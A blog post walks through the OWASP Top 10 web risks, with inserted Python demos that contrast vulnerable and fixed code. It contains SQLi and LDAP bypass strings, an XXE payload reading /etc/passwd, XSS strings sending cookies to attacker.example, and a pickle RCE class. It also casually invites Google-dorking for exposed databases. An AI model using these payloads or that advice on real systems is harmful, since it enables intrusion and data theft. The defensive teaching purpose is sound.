Using Burp Suite to exploit OWASP Top 10 — Part 2

Ahmad Moaaz
7 min read · Aug 22, 2020

Let's get into what the OWASP Top 10 is all about!

For those who want to go back to Part 1 for the configuration of Burp and the rest of the setup, click here.

What is OWASP Top 10?

The purpose of the OWASP (Open Web Application Security Project) Top 10 is to make developers, managers, organizations and security professionals aware of the most common and most damaging classes of attack against web applications. It is revised periodically, roughly every three to four years (2013 and 2017 are the most recent editions at the time of writing), based on the vulnerability data OWASP collects and the attack trends that data shows rising.

The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. — OWASP

Warning about using automated tools!

OWASP also maintains its own tool, ZAP (Zed Attack Proxy), which is good at finding vulnerabilities in a web application. It can be used for both manual and automated testing, but I strongly suggest not leaning on automated scanners, especially if you are new to pentesting, because you will miss a lot. You get used to relying on the tool, and that makes for a pentester with little real skill.

There are excellent automated tools out there that are used worldwide, but they are best used once you know what is actually happening behind the scenes: which payloads are being sent to the application and against which parameters. Running tools blindly can crash the application, or worse: if you fire payloads at a production application through a POST request that writes straight to the database, you can end up corrupting or deleting live data. So scope the scanner and be careful when using these automated tools.

Portswigger’s official site also mentions it here.

Alright, enough with the warnings; let's get back to OWASP.

Many pentesters, and many organizations, make it compulsory for their security engineers to work through the OWASP Top 10 while performing a penetration test so that nothing obvious is missed.

Let's now discuss what that "Top 10" means. They are the ten most common and most dangerous risk categories for web applications (this is the 2017 edition of the list), which are:

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

1) Injection

As the name says, this class of vulnerability occurs when a user is able to inject their own data into something the server passes to an interpreter (SQL, LDAP, an OS shell) as part of a command. Untrusted input is mixed into the query or command text, so the interpreter cannot tell the developer's code from the attacker's data. These are among the oldest attacks in the history of web security and probably the most dangerous ones, because they can result in DoS (Denial of Service), data theft or full compromise of the web application.

We are going to discuss a few injection attacks, including the famous SQLi, LDAP injection and OS command injection.

SQLi

This attack targets the database behind the application. On successful exploitation an attacker can dump the complete database of the target site or, sometimes worse, write a web shell or execute commands on the server, leading to full compromise of the application.

(Image: SQL injection overview, PortSwigger)

This vulnerability occurs when an application trusts user input blindly and builds its query by concatenating that input into the SQL text, with no validation and no parameterization.

NEVER TRUST USER INPUT!!

Developers should always build applications that never trust user input. Validation has to happen on the server, not only in the browser, because the attacker controls the client and can send anything to the server directly; and for SQL the real fix is parameterized queries (prepared statements), so that input is passed as data and never interpreted as code. Skipping that is how these applications get pwned!!
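The following is an added example, not code from the original post, showing the two login queries side by side: the concatenated one the post warns about and the parameterized one. It uses an in-memory SQLite table with constructed demo rows (plaintext passwords only for brevity; a real application stores hashes, and concatenation is just as injectable with hashes). The function and table names are my own.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demo; a real app would use its own DB."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def rendered_query(username, password):
    """The exact SQL text the vulnerable login sends to the database, for inspection."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Vulnerable: input is pasted into the SQL text, so a quote in it becomes SQL syntax.
    SQLite treats '--' as a comment, so "alice' --" drops the password check entirely."""
    return db.execute(rendered_query(username, password)).fetchone() is not None


def login_safe(db, username, password):
    """Hardened: a parameterised query. The driver sends the values separately from the
    statement text, so a quote in the input is only ever a character inside a string."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    attempts = [("alice", "s3cret"),          # legitimate
                ("alice' --", "anything"),    # comment out the password check
                ("nobody", "' OR '1'='1")]    # make the WHERE clause always true
    for user, pw in attempts:
        print("user=%r password=%r -> vulnerable=%s safe=%s"
              % (user, pw, login_vulnerable(db, user, pw), login_safe(db, user, pw)))
        print("   SQL seen by the database:", rendered_query(user, pw))
```

Run it and compare the two columns: the concatenated query accepts both payloads, the parameterized one accepts only the real credentials. The same pattern applies to every driver; the placeholder syntax (`?`, `%s`, `:name`) varies, the principle does not.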

LDAP Injection

Like SQLi, LDAP injection (LDAP is the Lightweight Directory Access Protocol) exploits unsanitized user input. In SQLi the malicious input is placed into an SQL statement to extract data; in LDAP injection the attacker takes advantage of LDAP search filters. Let's see with an example how this works.

Some examples of filters:

  • (cn=Ahmad*) matches entries where the common name starts with Ahmad (* matches any sequence of characters)
  • (!(cn=*Moaaz)) matches entries where the common name doesn't end with Moaaz (! is logical NOT)
  • (&(cn=A*)(cn=*Moaaz)) matches entries where the common name starts with A and ends with Moaaz (& is logical AND)

Applications that use LDAP build filters like these from the input fields behind the scenes; if the input is not sanitized, that can result in compromise of the application:

filter = "(&(userID=" + UsrName + ")(password=" + UsrPwd + "))"

In the code above, if an attacker puts * in both UsrName and UsrPwd, the filter becomes (&(userID=*)(password=*)), which matches every entry that has both attributes, so the application may log the attacker in as the first user returned: an authentication bypass. The characters with special meaning inside a filter value (*, (, ), \ and NUL) must be escaped as described in RFC 4515 before the value is placed in the filter.
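As an added example (not from the original post), here is the post's filter built both ways, unsafe and with RFC 4515 escaping, run against a small constructed directory through a minimal filter evaluator written for this demo. The evaluator covers only the &, |, ! and attr=value forms and is not a real LDAP client; the entries, attribute names and function names are my own.

```python
import re

# Constructed directory entries standing in for an LDAP server (demo data only).
DIRECTORY = [
    {"userID": "ahmad", "password": "Winter2020"},
    {"userID": "admin", "password": "correct horse battery staple"},
]


def escape_filter_value(value):
    """RFC 4515 escaping for a value placed inside an LDAP search filter: the characters
    * ( ) \\ and NUL become \\XX hex sequences and lose their syntactic meaning."""
    return "".join("\\%02x" % ord(ch) if ch in "*()\\\x00" else ch for ch in value)


def build_filter_vulnerable(username, password):
    """The post's concatenation: user input becomes filter syntax."""
    return "(&(userID=" + username + ")(password=" + password + "))"


def build_filter_safe(username, password):
    """Same filter, both values escaped before insertion."""
    return "(&(userID=%s)(password=%s))" % (escape_filter_value(username),
                                            escape_filter_value(password))


def _unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def _match_value(pattern, actual):
    """LDAP substring semantics: an unescaped * matches any run of characters; everything
    else, including an escaped \\2a, is literal. Case-insensitive like caseIgnoreMatch."""
    regex = ".*".join(re.escape(_unescape(part)) for part in pattern.split("*"))
    return re.fullmatch(regex, actual, re.IGNORECASE) is not None


def _parse(s, entry):
    """Recursive-descent evaluator for (&...), (|...), (!...) and (attr=value)."""
    if not s.startswith("(") or len(s) < 2:
        raise ValueError("expected a filter at %r" % s[:10])
    s = s[1:]
    if s[0] in "&|":
        op, s, results = s[0], s[1:], []
        while s.startswith("("):
            r, s = _parse(s, entry)
            results.append(r)
        if not s.startswith(")"):
            raise ValueError("unbalanced filter")
        return (all(results) if op == "&" else any(results)), s[1:]
    if s[0] == "!":
        r, s = _parse(s[1:], entry)
        if not s.startswith(")"):
            raise ValueError("unbalanced filter")
        return (not r), s[1:]
    end = s.index(")")
    attr, _, pattern = s[:end].partition("=")
    actual = entry.get(attr)
    return (actual is not None and _match_value(pattern, actual)), s[end + 1:]


def evaluate(filter_str, entry):
    result, rest = _parse(filter_str, entry)
    if rest:
        raise ValueError("trailing data after filter: %r" % rest)
    return result


def users_matching(filter_str):
    """userIDs of every directory entry the filter matches (what the app would 'log in')."""
    return [e["userID"] for e in DIRECTORY if evaluate(filter_str, e)]


if __name__ == "__main__":
    for builder in (build_filter_vulnerable, build_filter_safe):
        f = builder("*", "*")
        print("%-24s %-36s matches %s" % (builder.__name__, f, users_matching(f)))
```

With `*` in both fields the unescaped filter matches every user, while the escaped filter `(&(userID=\2a)(password=\2a))` matches nobody, which is the correct answer for a literal asterisk. Real LDAP libraries ship this escaping (for example `ldap3.utils.conv.escape_filter_chars` or `ldap.filter.escape_filter_chars` in python-ldap); use theirs rather than re-implementing it.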

2) Broken Authentication

Broken authentication occurs when an application fails to protect the mechanism that proves who a user is, so that authentication can be bypassed or a session taken over. For example, some applications put the session ID in the URL (a GET request), where it passes through proxies, firewalls and web servers and gets saved in their logs, in browser history and in Referer headers; if an attacker gets hold of those logs, he or she can take over the victim's account.

http://example.com/dir;jsessionid=2P0OC2JSNDLPSKHCJUN2JV

Another example is having no brute-force protection or no password policy. A password policy, including a check against lists of previously breached and common passwords, is a must in order to be safe from dictionary attacks, which try thousands of such passwords; and if the login endpoint has no rate limiting or lockout, the attacker can simply keep guessing.

3) Sensitive Data Exposure

Some applications do not protect their sensitive data from being exposed. Sometimes you will find it surprisingly easy to find passwords or, even worse, the application's whole database!!

So recently I was just browsing a web site, and I have a habit of adding random directories at the end of the URL, so I added /db and guess what? I saw a file named site.db, which was the complete database of that application. These little things can lead to compromise of your whole application. This can include anything sensitive which the application is exposing, e.g. credit card numbers, admin usernames or passwords, transaction history, firewall logs, no TLS, unsalted hashes etc. If you want to see all this information, visit here and do some Google Dorking. You will be surprised!

4) XML External Entities (XXE)

An XXE attack occurs when an application parses XML from an untrusted source with a parser that is configured (often by default, in older libraries) to resolve external entities declared in the document's DTD, so the attacker's document can make the parser read a file or URL of the attacker's choosing.

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

An attacker can extract system files like /etc/passwd as shown in the example above. In the worst case it can lead to RCE (Remote Code Execution), for instance in PHP applications where the expect extension is installed, because the expect:// wrapper runs a command instead of reading a file.
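As an added example that is not part of the original post, this runs the payload above through Python's xml.sax parser twice: once with external general entities enabled (the vulnerable configuration, which Python turned off by default in 3.7.1) and once with them disabled. To keep it self-contained the entity points at a constructed temporary file instead of /etc/passwd; the file contents and function names are my own.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data the parser hands to the application."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_document(xml_bytes, resolve_external_entities):
    """Parse with xml.sax. feature_external_ges=True recreates the vulnerable parser:
    the SAX reader then opens the entity's SYSTEM id (file or URL) and splices it in."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def xxe_payload(path):
    """The post's payload, pointed at an arbitrary local file instead of /etc/passwd."""
    template = (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        '<!ENTITY xxe SYSTEM "%s" >]>\n'
        "<foo>&xxe;</foo>"
    )
    return (template % pathlib.Path(path).as_uri()).encode("iso-8859-1")


def demo():
    """Returns (text seen with entities resolved, text seen with them disabled)."""
    # Constructed stand-in for /etc/passwd so the demo never reads anything real.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_document(payload, resolve_external_entities=True)
        blocked = parse_document(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("entities resolved ->", repr(leaked))
    print("entities disabled ->", repr(blocked))
```

The first parse returns the file's contents as the text of `<foo>`, which is exactly what an application would then echo back, store or put in an error message; the second returns an empty string because the reference is skipped. The same switch exists in every mainstream parser (`disallow-doctype-decl` / `external-general-entities` in Java, `libxml_disable_entity_loader` and `LIBXML_NOENT` in PHP, `XMLResolver = null` in .NET); the fix is to turn DTD processing off, not to filter the input.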

5) Broken Access Control

Access control exists to prevent users from acting outside their intended permissions. It is the mechanism that decides who can and cannot access which resource. When it is broken, an attacker can read other users' information or access, and even modify, resources that belong to other users.

http://example.com/dashboard?role=normalUser

If an attacker changes normalUser to admin, for example, he might land in the admin dashboard with privileges only an admin should have; the role must come from the server-side session, never from a parameter the client controls. Whenever you are performing a pentest, always have a close look at the parameters and play with them. One of the most common vulnerabilities in this category is IDOR (Insecure Direct Object Reference). This occurs when user-supplied input selects an object that belongs to another user and the server never checks ownership. For example:

http://example.com/dashboard/ViewRemaingCash?id=12223

If an attacker changes the value of id to 12224, he is able to see another user's dashboard with that user's remaining cash, because the server trusts the id without checking that it belongs to the logged-in user.
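The two endpoints above, modelled as plain functions, in an added example that is not from the original post: the role parameter and the account id handled the broken way and the fixed way. The account records, session store, token strings and function names are constructed for the demo.

```python
# Constructed data: what the ViewRemainingCash endpoint would read from its database.
ACCOUNTS = {
    12223: {"owner": "alice", "remaining_cash": 412.50},
    12224: {"owner": "bob", "remaining_cash": 9000.00},
}
# Server-side session store: the role lives here, not in the URL.
SESSIONS = {
    "tok-alice": {"user": "alice", "role": "normalUser"},
    "tok-bob": {"user": "bob", "role": "normalUser"},
    "tok-carol": {"user": "carol", "role": "admin"},
}


def _session(token):
    if token not in SESSIONS:
        raise PermissionError("not authenticated")
    return SESSIONS[token]


def view_remaining_cash_vulnerable(token, account_id):
    """IDOR: the caller is authenticated, but nothing ties account_id to the caller."""
    _session(token)
    return ACCOUNTS[account_id]["remaining_cash"]


def view_remaining_cash_safe(token, account_id):
    """Ownership check on every object access; deny by default."""
    session = _session(token)
    account = ACCOUNTS.get(account_id)
    if account is None or (account["owner"] != session["user"] and session["role"] != "admin"):
        # Same error for 'does not exist' and 'not yours', so ids cannot be enumerated.
        raise PermissionError("account not available")
    return account["remaining_cash"]


def dashboard_vulnerable(token, role_param):
    """dashboard?role=... trusted from the query string: anyone can ask for role=admin."""
    _session(token)
    return "admin dashboard" if role_param == "admin" else "user dashboard"


def dashboard_safe(token, role_param=None):
    """Role taken from the session; the query parameter is ignored entirely."""
    session = _session(token)
    return "admin dashboard" if session["role"] == "admin" else "user dashboard"


def attempt(fn, *args):
    """Run an endpoint and report the outcome as a string."""
    try:
        return "ok: %s" % fn(*args)
    except PermissionError as e:
        return "denied: %s" % e


if __name__ == "__main__":
    print("alice reads bob's cash (vulnerable):", attempt(view_remaining_cash_vulnerable, "tok-alice", 12224))
    print("alice reads bob's cash (safe):      ", attempt(view_remaining_cash_safe, "tok-alice", 12224))
    print("alice asks for role=admin (vuln):   ", attempt(dashboard_vulnerable, "tok-alice", "admin"))
    print("alice asks for role=admin (safe):   ", attempt(dashboard_safe, "tok-alice", "admin"))
```

When testing for IDOR, do exactly what the safe version forbids: log in as two users, capture the id one of them legitimately uses, and replay it from the other's session. Sequential ids like 12223 make enumeration trivial, but random ids are not a fix on their own; the ownership check is.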

6) Security Misconfiguration

Security misconfiguration is one of the most common vulnerability classes. Many developers overlook these issues, thinking they have no impact on security: leaving extra ports open, running outdated vulnerable software or default accounts, or showing verbose error messages and stack traces on the web page, which hand an attacker details about the stack.

7) Cross-site scripting (XSS)

Cross-site scripting is a client-side vulnerability: it targets the users of an application rather than the server. XSS can be extremely dangerous and can be used to deface a web application, run malicious JavaScript in the victim's browser, or steal session cookies, which leads to account takeover. According to OWASP, XSS is found in around two-thirds of all web applications. This vulnerability occurs when an application places user input into a page without escaping it for the context (HTML body, attribute, JavaScript string, URL) in which it lands.
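An added example, not from the original post, of a server-side template rendering a comment with and without context-aware escaping, using Python's html.escape. The template, the two attacker inputs and the function names are constructed for the demo; the attacker host name is a placeholder.

```python
import json
from html import escape

TEMPLATE = '<div class="comment" data-author="%s"><p>%s</p></div>'

# Constructed attacker inputs: one breaks out of the quoted attribute, one injects a script.
ATTR_BREAKOUT = 'eve" onmouseover="fetch(\'//attacker.example/?c=\'+document.cookie)'
SCRIPT_INJECT = "<script>document.location='//attacker.example/?c='+document.cookie</script>"


def render_comment_vulnerable(author, text):
    """Reflects both values into the page untouched."""
    return TEMPLATE % (author, text)


def render_comment_safe(author, text):
    """Escapes each value for the HTML context it lands in. quote=True matters for the
    attribute: without it a double quote in `author` closes the attribute and the attacker
    can add an event handler without ever using < or >."""
    return TEMPLATE % (escape(author, quote=True), escape(text, quote=True))


def js_string_literal(value):
    """For a value placed inside an inline <script> string: JSON-encode it and additionally
    encode < so that a '</script>' inside the value cannot close the script element."""
    return json.dumps(value).replace("<", "\\u003c")


def js_roundtrips(value):
    """The JS-escaped form still decodes to the original value (nothing was lost)."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTR_BREAKOUT, SCRIPT_INJECT))
    print(render_comment_safe(ATTR_BREAKOUT, SCRIPT_INJECT))
    print(js_string_literal("</script><script>alert(1)</script>"))
```

HTML escaping is the right tool for body text and quoted attributes; a value dropped into a JavaScript string, a URL or an unquoted attribute needs that context's own encoding, which is why `js_string_literal` exists separately. Setting `HttpOnly` on the session cookie removes `document.cookie` from what a successful injection can reach, but it does not stop the injection itself.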

8) Insecure Deserialization

Before learning about deserialization we need to know what serialization is. Serialization takes an object from an application and converts it into a byte or text format that can be stored or sent over the network. Deserialization is the opposite: it takes that serialized data and converts it back into an object the application can use.

Insecure deserialization is when the application deserializes data the attacker controls using a format (Java serialization, PHP unserialize, Python pickle, .NET BinaryFormatter) that lets the data itself decide which classes are instantiated and which methods run. Tampering with the serialized object can then lead to Remote Code Execution (RCE), one of the most dangerous outcomes.
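The following added example (mine, not the post's) shows the mechanism with Python's pickle: the serialized bytes carry a `__reduce__` result telling the loader which callable to invoke, so `pickle.loads` on attacker bytes runs a command. The "command" is a harmless `echo` so the demo is safe to run; the class, function names and the allow-list in the restricted loader are my own choices.

```python
import io
import pickle
import subprocess


class Exploit:
    """What an attacker serialises. pickle stores the result of __reduce__ (a callable and
    its arguments) and pickle.loads() calls it to 'rebuild' the object: that is the RCE.
    A real payload would use os.system with a reverse shell; echo keeps this demo harmless."""

    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned-by-pickle"],))


def attacker_payload():
    return pickle.dumps(Exploit())


def legitimate_payload():
    """What the application actually expected to receive: a plain profile dict."""
    return pickle.dumps({"user": "alice", "balance": 12})


def load_profile_vulnerable(blob):
    """pickle.loads on attacker-controlled bytes executes whatever __reduce__ asked for.
    The return value is whatever that callable returned (here, echo's output)."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list the globals a pickle may reference. The payload needs
    subprocess.check_output, which is not on the list, so the load fails before any call."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"),
               ("builtins", "int"), ("builtins", "float")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def load_profile_restricted(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def restricted_load_blocked(blob):
    """True if the restricted loader refuses the blob."""
    try:
        load_profile_restricted(blob)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    print("vulnerable loader returned:", load_profile_vulnerable(attacker_payload()))
    print("restricted loader blocked exploit:", restricted_load_blocked(attacker_payload()))
    print("restricted loader still loads data:", load_profile_restricted(legitimate_payload()))
```

The allow-list approach is a mitigation, not a cure: the safest design is to not deserialize native object graphs from untrusted sources at all and to use a data-only format such as JSON with schema validation. Where a native format is unavoidable, sign the serialized bytes and verify the signature before deserializing.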

9) Using components with known vulnerabilities

This category refers to applications using libraries, modules or frameworks that already have publicly known vulnerabilities, which an attacker can exploit using publicly available exploits: version numbers map straight to CVE entries and exploit repositories.

For example, many sites that run an older version of WordPress, or outdated plugins, are prone to multiple attacks simply because components with known vulnerabilities are in use and the developer or site owner never updated them.

10) Insufficient logging and monitoring

According to IBM, the average company takes about 197 days to identify a breach and a further 69 days to contain it. That is how long an attacker can remain undetected and keep causing damage.

This happens because many applications neglect logging and monitoring of security-relevant events. Logins, failed logins, access control failures, input validation failures and high-value transactions should all be logged with enough context (who, from where, when, what) to reconstruct an incident; the logs should be shipped somewhere the attacker cannot tamper with; and timely action should be taken when something suspicious shows up.
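As an added example that is not part of the original post, here is the kind of detection that such logs make possible: a sliding-window rule over failed-login records that flags a source address once it crosses a threshold and notes which accounts it targeted. The log format, sample lines, addresses and thresholds are all constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed sample of an application's authentication log (not real traffic).
SAMPLE_LOG = """\
2020-08-22T10:00:01Z ip=198.51.100.9 user=bob event=login_failed
2020-08-22T10:00:05Z ip=203.0.113.7 user=alice event=login_failed
2020-08-22T10:00:09Z ip=203.0.113.7 user=alice event=login_failed
2020-08-22T10:00:14Z ip=203.0.113.7 user=admin event=login_failed
2020-08-22T10:00:20Z ip=198.51.100.9 user=bob event=login_success
2020-08-22T10:00:27Z ip=203.0.113.7 user=admin event=login_failed
2020-08-22T10:00:33Z ip=203.0.113.7 user=root event=login_failed
2020-08-22T10:00:41Z ip=203.0.113.7 user=alice event=login_failed
2020-08-22T10:10:02Z ip=198.51.100.9 user=bob event=login_failed
this line is malformed and must not crash the detector
""".splitlines()

LOG_LINE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) event=(?P<event>\S+)$")


def parse_line(line):
    """One log record -> dict, or None for lines that do not match the expected format."""
    m = LOG_LINE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "ip": m["ip"], "user": m["user"], "event": m["event"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert the first time a source IP reaches `threshold` failed logins inside any
    `window_seconds` span. Recording the targeted accounts separates a single-account
    brute force from password spraying across many accounts."""
    recent = defaultdict(deque)  # ip -> deque of (timestamp, user) still inside the window
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["event"] != "login_failed":
            continue
        q = recent[ev["ip"]]
        q.append((ev["ts"], ev["user"]))
        while (ev["ts"] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in alerts:
            alerts[ev["ip"]] = {
                "at": ev["ts"].isoformat(),
                "failures": len(q),
                "users": sorted({user for _, user in q}),
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print("ALERT %s: %d failed logins by %s, accounts %s"
              % (ip, alert["failures"], alert["at"], ", ".join(alert["users"])))
```

Note what the rule needs from the log: a timestamp, the source address, the target account and a stable event name on every line. Without those fields, which is the usual state of an application that logs only stack traces, the 197 days in the IBM figure are easy to explain.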

So we have covered what the OWASP Top 10 is. In the next post I will show you how to exploit each of these vulnerabilities in detail.


Ahmad Moaaz

A Security Engineer/Penetration Tester who likes breaking into applications